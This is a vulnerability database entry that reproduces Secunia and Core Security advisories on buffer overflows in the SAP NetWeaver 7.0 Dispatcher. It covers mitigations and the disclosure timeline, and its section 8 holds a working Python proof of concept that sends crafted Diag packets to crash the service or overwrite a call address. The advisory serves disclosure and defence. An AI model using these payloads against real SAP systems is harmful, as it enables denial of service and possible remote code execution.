ID

VAR-201205-0131

CVE

CVE-2012-2513

TITLE

SAP NetWeaver of Diaginput Service disruption in functions ( Daemon crash ) Vulnerabilities

DESCRIPTION

The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities SECUNIA ADVISORY ID: SA48980 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 RELEASE DATE: 2012-05-09 DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48980/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system. The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies. ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

buffer overflow

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Core Security - Corelabs

SOURCES

LAST UPDATE DATE

2024-11-23T22:18:55.126000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE